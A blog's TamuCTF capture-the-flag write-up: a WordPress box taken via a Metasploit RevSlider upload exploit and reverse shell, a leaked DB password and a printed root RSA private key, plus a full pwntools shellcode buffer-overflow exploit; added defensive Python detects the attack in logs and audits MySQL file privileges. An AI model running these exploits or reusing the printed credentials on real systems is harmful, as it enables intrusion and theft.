Mars's 5εcur1ty Memorandum

An irregularly updated technical blog focused on information security: CTFs, vulnerability verification, bug bounty report analysis, and more.

TamuCTF writeup

TamuCTF was a 9-day-long CTF, and many of the challenges are practical ones that we can use in the real world. This is the fifth time I have participated in the CTF, and personally I think it was easier than usual. I still need to learn more basic knowledge, as I almost didn't get any points in the Android, Network, ReadingRainbow, and Web fields. As each Honeypot challenge had an extraordinarily big file, I couldn't download it! Eventually, I was 322nd out of 1896 teams. Anyway, I need to practice more web, reversing, pwn, and networking challenges.

This post includes the writeups for the following challenges.

Network

Wordpress


We find two hosts with nmap.


Then we open host 172.30.0.3 on port 80.

curl -v 172.30.0.3


The server hosts a WordPress site. The hint in the title says the flag is at /root/flag.txt, so we look for a way to get into host 172.30.0.3 and read it. Then we run wpscan to detect vulnerable components.

wpscan --url 172.30.0.3


We find two vulnerabilities. The first one is a file read vulnerability:

Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1579

The second one is a file upload vulnerability.

WordPress Plugin Slider REvolution 3.0.95 / Showbiz Pro 1.7.1 - Arbitrary File Upload

Unfortunately, the flag can only be read with root privilege, which the file read vulnerability does not give us, so we focus on the second vulnerability.

In this case, we can use Metasploit.

$msfconsole

 [-] Failed to connect to the database: could not connect to server: Connection refused

Is the server running on host "localhost" (::1) and accepting

TCP/IP connections on port 5432?

    could not connect to server: Connection refused

Is the server running on host "localhost" (127.0.0.1) and accepting

TCP/IP connections on port 5432?                            

    cowsay++

    ____________

   < metasploit >

   ------------
   \   ,__,
    \  (oo)____
       (__)    )\
          ||--|| *
          =[ metasploit v4.17.3-dev                          ]
    -- --=[ 1795 exploits - 1019 auxiliary - 310 post       ]
    -- --=[ 538 payloads - 41 encoders - 10 nops            ]
    -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
    msf > search revslider

  [!] Module database cache not built yet, using slow search
    Matching Modules
    ================
    Name                                             Disclosure Date  Rank       Description
      ----                                             ---------------  ----       -----------
     exploit/unix/webapp/wp_revslider_upload_execute  2014-11-26       excellent  WordPress RevSlider File Upload and Execute Vulnerability

    msf > use exploit/unix/webapp/wp_revslider_upload_execute
    msf exploit(unix/webapp/wp_revslider_upload_execute) > set RHOST 172.30.0.3
   RHOST => 172.30.0.3
   msf exploit(unix/webapp/wp_revslider_upload_execute) > exploit

   [*] Started reverse TCP handler on 172.30.0.14:4444 
   [+] Our payload is at: /wp-content/plugins/revslider/temp/update_extract/revslider/xyXWLY.php
   [*] Calling payload...
   [*] Sending stage (37775 bytes) to 172.30.0.3
   [*] Meterpreter session 1 opened (172.30.0.14:4444 -> 172.30.0.3:32924) at 2019-03-05 04:29:29 -0500
   [+] Deleted xyXWLY.php
   [+] Deleted ../revslider.zip

   meterpreter > pwd
   /var/www/wp-content/plugins/revslider/temp/update_extract/revslider
   meterpreter > shell
   Process 78 created.
   Channel 0 created.
   python -c 'import pty; pty.spawn("/bin/bash")'
   <t/plugins/revslider/temp/update_extract/revslider$ pwd
   pwd
   /var/www/wp-content/plugins/revslider/temp/update_extract/revslider
   <t/plugins/revslider/temp/update_extract/revslider$ cd /var/www
   cd /var/www
   www-data@apacheword:/var/www$ ls
   ls
   index.php     wp-admin          wp-cron.php    wp-mail.php
   license.txt   wp-blog-header.php    wp-includes    wp-settings.php
   note.txt  wp-comments-post.php  wp-links-opml.php  wp-signup.php
   readme.html   wp-config.php         wp-load.php    wp-trackback.php
   wp-activate.php  wp-content         wp-login.php   xmlrpc.php
   www-data@apacheword:/var/www$ cat note.txt
   cat note.txt
   Your ssh key was placed in /backup/id_rsa on the DB server.
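From the defender's side, the two wpscan findings and the Metasploit run above leave recognisable traces in the web server's access log: a `revslider_show_image` request to admin-ajax.php whose `img` parameter contains `..`, and a PHP file being requested out of `revslider/temp/update_extract/` (the path the module reported for its payload). The following is an added example, not code from the writeup, that applies those two rules to Apache combined-format log lines; the sample lines are constructed, and the rules assume the default `/wp-admin` and `/wp-content/plugins` paths.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache "combined"-style access log line: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# PHP executed from RevSlider's extraction directory; the path shape matches the
# payload location the Metasploit module printed in the writeup.
UPDATE_EXTRACT_RE = re.compile(
    r'/wp-content/plugins/revslider/temp/update_extract/.*\.php$', re.IGNORECASE
)


def classify_request(target: str):
    """Return a rule name for a suspicious request target, or None for a benign one."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    if path.lower().endswith("/wp-admin/admin-ajax.php"):
        qs = parse_qs(parts.query, keep_blank_values=True)
        if "revslider_show_image" in qs.get("action", []):
            for img in qs.get("img", []):
                # parse_qs already percent-decodes once; decoding again also
                # catches double-encoded variants such as %252e%252e.
                if ".." in unquote(img):
                    return "revslider_show_image traversal (CVE-2015-1579)"
    if UPDATE_EXTRACT_RE.search(path):
        return "PHP executed from revslider/temp/update_extract (uploaded payload)"
    return None


def scan_log(lines):
    """Return (client_ip, rule, target) for every suspicious access-log line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        rule = classify_request(m.group("target"))
        if rule:
            findings.append((m.group("ip"), rule, m.group("target")))
    return findings


# Constructed sample log lines (not real traffic). The attacker address and the
# payload file name mirror the Metasploit output in the writeup.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Mar/2019:04:10:02 -0500] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [05/Mar/2019:04:10:03 -0500] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=uploads/2019/03/banner.jpg HTTP/1.1" 200 41230 "-" "Mozilla/5.0"
172.30.0.14 - - [05/Mar/2019:04:29:20 -0500] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3215 "-" "curl/7.64.0"
172.30.0.14 - - [05/Mar/2019:04:29:21 -0500] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=%2e%2e/wp-config.php HTTP/1.1" 200 3215 "-" "curl/7.64.0"
172.30.0.14 - - [05/Mar/2019:04:29:29 -0500] "GET /wp-content/plugins/revslider/temp/update_extract/revslider/xyXWLY.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for ip, rule, target in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{rule}\t{target}")
```

The second rule is the more durable one: the traversal signature is specific to the 2015 bug, but any PHP served from a plugin's temp or extraction directory is worth an alert regardless of which upload bug put it there.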

As I mentioned, we can't open the flag file because flag.txt can only be read by root. Here we got an important piece of information: if we can find the private key on the DB server (path: /backup/id_rsa), we can consider logging in as root via SSH. Some significant information may be hidden inside the configuration file wp-config.php, so we check wp-config.php.

cat wp-config.php 
   cat wp-config.php
   <?php
   /**
    * The base configuration for WordPress
    *
    * The wp-config.php creation script uses this file during the
    * installation. You don't have to use the web site, you can
    * copy this file to "wp-config.php" and fill in the values.
    *
    * This file contains the following configurations:
    *
    * * MySQL settings
    * * Secret keys
    * * Database table prefix
    * * ABSPATH
    *
    * @link https://codex.wordpress.org/Editing_wp-config.php
    *
    * @package WordPress
    */
   // ** MySQL settings - You can get this info from your web host ** //
   /** The name of the database for WordPress */
   define('DB_NAME', 'wordpress');
   /** MySQL database username */
   define('DB_USER', 'wordpress');

   /** MySQL database password */
   define('DB_PASSWORD', '0NYa6PBH52y86C');

   /** MySQL hostname */
   define('DB_HOST', '172.30.0.2');

   /** Database Charset to use in creating database tables. */
   define( 'DB_CHARSET', 'utf8' );

   /** The Database Collate type. Don't change this if in doubt. */
   define( 'DB_COLLATE', '' );
   ...

We got the DB password.

Connect to the DB:

mysql -u wordpress -h 172.30.0.2 -p wordpress
Enter password:

MySQL [wordpress]> select load_file('/backup/id_rsa');

Then we get the RSA private key.

   | -----BEGIN RSA PRIVATE KEY-----
   MIIEpAIBAAKCAQEA3Z35DpTcnm4kFkkGp6iDXqvUNH+/+hSDOY6rXsa40WMr7rjc
   tHh8TgOBFZ6Rj5VzU/jY8O0qHxiPVn7BCYKhqyp1V1l9/ZCPRSjRLYy62dVTiHUt
   ZbiPiY9+biHIsQ/nZfwiHmwlb0sWDoyFvX3OL/3AFMcYpZ4ldHQuwszJF4DeTV33
   ruSBoXIiICQyNJBHTboVel+WXAfMNumYMVNrtrwpNoD7whv9Oa2afUejXMJL42Rw
   8Xhab59HIIL9fl68FqgggVI4X3d/fzqKKGyoN5JxBLmQTCiVxhxTMv9OS0MhdSg6
   Nh3+lf/wUuweUQXqmohvETntwwGs8jnJGCyeDwIDAQABAoIBAHGVRpG/n/cfMiWt
   1dhWGMaLwJ4Ln6QXoU39nj1cEltWvayDWLKyUdtWFnGzLJ1vloVCNEX+96iqWMSX
   AG7UYfGtOCjFuDoePh/PFK6IwzdkC4UTsWnCFucFAWKGtCpzoUB24jG/ccxBqpNY
   WC9PbD7SigDcLfisPjwaU+EJPkNpl93VBk1BCJRbvWF+Wl/si3wmMZ0YRoyIAF5L
   oBsq935xH8kJcixSVYKjG3hMUZfiLoQB+p/IFsxDlfGLE+M1esTZ5GIRjj+t7vBN
   l2JZTY893gjfQzUv2WrJXzMhJvWGzOCsRRc4gOSeS6GYiip8glqg8iWHpWdgF6i9
   oAQx5pkCgYEA7oTmvy0cXvhPjkEbrizCCqf6sXfZps5e6eminTTBGA8NW/Uq+SQv
   5JEYxvIL+qMH6cKkc8rBaNhgy3vnv+UgE1PUFI0UWFGKb+OpzzvY/zkmf03enxrl
   SK+QXH4FS9f7leivZRVEWBq1kDVIqHZtybYGg0etOvHYX0GwqV2UTy0CgYEA7dv0
   bxz6CO9bhxxpXRrrykX2Z57J3JW2I3yVkCY+4Y6x106K11X+b1547kEZk40i2Ugc
   iE6jcYIRiYNiSgb0Ph4uxZHFlvBr8JA2fGHYIAnGRcoc1Gzgz5omRvU9H8uy5ipO
   LyZ2dnMgXRVOjuXoN4UZR2rgWmJVLD1q7eKnh6sCgYAnVOUUC2VNR9celx/wZdMN
   nMubLi9G8Wr3WZ6GG+fnhrvmORSABvaa005pqApPp0irxHwH2BxypJO5mlIJ88eJ
   SF6FkQoU0kVo0/rxgGX1GEB/56BZTj8W8FR23BUVf6UuADPEEHC3spfUEuVLWlQa
   WhjS1yP6v1y1wIhYNWU6dQKBgQDbZ1zdcXkh7MgcpRR7kW2WM1rK0imZk29i5HSB
   dwXhwWJCHGztnKEJ0bby7pHNDQ7sJhxLj14sQbIzikGLz0ZUVjsGeyQryrGGQUBB
   E2/sfZeqoHhfad8lICfWpDgxsA/hR3y++VekgyWDNzgzj9bX/6oFuowgUzwFhtGv
   hLbL6QKBgQCvcDMmWs2zXwmIo1+pIHUUSv2z3MWb0o1dzHQI/+FJEtyQPwL1nCwg
   bJaC0KT45kw0IGVB2jhWf0KcMF37bpMpYJzdsktSAmHdjLKdcr6vw2MNpRapaNQe
   On0QmLzbpFr9kjqorinKVkjk/WlTo9rKDSrLiUueEVYTxEMCi92giw==
   -----END RSA PRIVATE KEY-----
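The pivot above only works because the WordPress DB account can call load_file() on the DB server: that needs the global FILE privilege (or ALL PRIVILEGES on *.*) and a secure_file_priv setting that does not exclude /backup. The challenge's actual grants are not shown in the writeup, so the ones below are constructed; the audit function itself is an added example, not part of the writeup, and takes the text of SHOW GRANTS plus the secure_file_priv value as input so it can run without a database.

```python
import re

# Global privileges that enable LOAD_FILE() and SELECT ... INTO OUTFILE. FILE can
# only be granted on *.*, and ALL PRIVILEGES on *.* includes it.
FILE_PRIVS = {"FILE", "ALL", "ALL PRIVILEGES"}

GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+"
    r"(?P<account>[`'\"][^`'\"]*[`'\"]@[`'\"][^`'\"]*[`'\"])(?P<rest>.*)$",
    re.IGNORECASE,
)


def parse_grant(stmt):
    """Split one SHOW GRANTS line into (privilege set, scope, account, trailing clauses)."""
    m = GRANT_RE.match(stmt.strip().rstrip(";"))
    if not m:
        raise ValueError(f"not a GRANT statement: {stmt!r}")
    privs = {p.strip().upper() for p in m.group("privs").split(",")}
    return privs, m.group("scope"), m.group("account"), m.group("rest").strip()


def audit_file_access(grants, secure_file_priv):
    """
    grants: the lines returned by SHOW GRANTS FOR the application account.
    secure_file_priv: the server variable as SHOW VARIABLES reports it: "" means
    unrestricted, "NULL" (or None) means file operations are disabled, anything
    else is the one directory that file operations are confined to.
    Returns (can_read_arbitrary_files, findings).
    """
    findings = []
    has_file_priv = False
    for stmt in grants:
        privs, scope, account, rest = parse_grant(stmt)
        held = privs & FILE_PRIVS
        if scope == "*.*" and held:
            has_file_priv = True
            findings.append(f"{account}: {', '.join(sorted(held))} ON *.* grants LOAD_FILE()/INTO OUTFILE")
        if "GRANT OPTION" in rest.upper():
            findings.append(f"{account}: WITH GRANT OPTION lets a compromised app account mint new privileges")
    if not has_file_priv:
        return False, findings
    sfp = "NULL" if secure_file_priv is None else secure_file_priv.strip()
    if sfp.upper() == "NULL":
        findings.append("secure_file_priv=NULL: file operations are disabled server-wide, FILE is inert")
        return False, findings
    if sfp == "":
        findings.append("secure_file_priv is empty: any file readable by the mysqld process can be fetched")
        return True, findings
    findings.append(f"secure_file_priv={sfp}: file operations are confined to that directory")
    return False, findings


# Constructed grants (the writeup does not show the real ones). load_file('/backup/id_rsa')
# succeeding implies the challenge account was at least this permissive.
WEAK_GRANTS = ["GRANT ALL PRIVILEGES ON *.* TO 'wordpress'@'%' WITH GRANT OPTION"]

# A least-privilege WordPress account: USAGE (no privileges) globally, table-level
# rights only on its own schema, and only from the web host's address.
HARDENED_GRANTS = [
    "GRANT USAGE ON *.* TO 'wordpress'@'172.30.0.3'",
    "GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, DROP, ALTER, INDEX ON `wordpress`.* TO 'wordpress'@'172.30.0.3'",
]

if __name__ == "__main__":
    for label, grants, sfp in [("weak", WEAK_GRANTS, ""), ("hardened", HARDENED_GRANTS, "")]:
        readable, notes = audit_file_access(grants, sfp)
        print(f"{label}: arbitrary file read = {readable}")
        for note in notes:
            print("  -", note)
```

Even with the hardened grants, a private key for root sitting in /backup on the DB host is a finding in its own right: the DB user is one of several ways that file could leak, and nothing in the application needs to read it.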

We can use this private key to log in as root.

nano pkey.key

Copy and paste the RSA private key into a key file (we create a file named pkey.key).

Set a passphrase on the key, then derive its public key:

ssh-keygen -p -f pkey.key

Enter new passphrase (empty for no passphrase): 
Enter same passphrase again: 

Your identification has been saved with the new passphrase.

root@fang:~# ssh-keygen -y -f pkey.key > pkey.pub
Enter passphrase: 

Use the private key to perform SSH authentication as root:

root@fang:~# ssh-add pkey.key

Enter passphrase for pkey.key: 

Identity added: pkey.key (pkey.key)

 root@fang:~# ssh root@172.30.0.3 
X11 forwarding request failed on channel 0

 Welcome to Ubuntu 14.04 LTS (GNU/Linux 4.4.0-141-generic x86_64)
  * Documentation:  https://help.ubuntu.com/
 The programs included with the Ubuntu system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.
 Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
 applicable law.

root@apacheword:~# ls
flag.txt
root@apacheword:~# cat flag.txt 
gigem{w0rd_pr3ss_b3st_pr3ss_409186FC8E2A45FE}

Access granted.

PWN

pwn3


Python code:

from pwn import *

# Connect to the challenge server; its first line leaks the buffer's address.
p = remote("pwn.tamuctf.com", 4323)
k = p.recvline()
print(k)

# The address is the 10th space-separated token, e.g. b"0xffffd5a0" (10 characters).
k = k.split(b" ")[9]
k = k[:10]
bufferLocation = p32(int(k, 16))

# 28-byte execve("/bin//sh") shellcode for 32-bit Linux.
shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
payload = b""
payload += shellcode
payload += b"\x90" * (298 - len(shellcode))  # pad the 298-byte buffer after the shellcode

payload += b"A" * 4          # saved EBP
payload += bufferLocation    # return address: the start of the buffer, where the shellcode sits

p.sendline(payload)
p.sendline(b"cat flag.txt")
p.interactive()
Copyright Mars 2019